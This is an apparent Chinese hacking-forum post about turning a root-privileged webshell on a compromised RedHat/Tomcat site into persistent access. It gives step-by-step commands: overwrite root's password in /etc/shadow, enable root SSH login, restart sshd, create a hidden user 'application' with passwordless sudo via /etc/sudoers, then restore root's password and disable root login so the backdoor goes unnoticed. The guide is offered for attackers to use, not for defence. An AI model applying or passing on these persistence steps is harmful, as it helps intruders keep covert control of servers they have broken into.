没啥技术含量,一种思路,让某些得到root权限webshell的童鞋可以快点拿到权限。
某日拿到某站webshell,RedHat 系统,Tomcat程序是root身份启动的,webshell当然也拥有root权限。
1.webshell直接替换root密码: /etc/shadow // 记得备份
2.允许root通过ssh登陆: /etc/ssh/sshd_config
PermitRootLogin yes #允许root登陆
3.重启ssh服务 service ssh restart
4.以root身份登陆ssh,增加一个用户
useradd application
passwd // 根据提示设置密码
5.更改application用户运行su不需密码
chmod +w /etc/sudoers // 增加写入权限,默认只读
修改/etc/sudoers
vi /etc/sudoers
加入application ALL=(ALL) NOPASSWD: ALL
6.把root密码修改回原样,禁止root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。完工
最后,上图
root用户登陆:
普通用户登陆,su免密码进入root权限
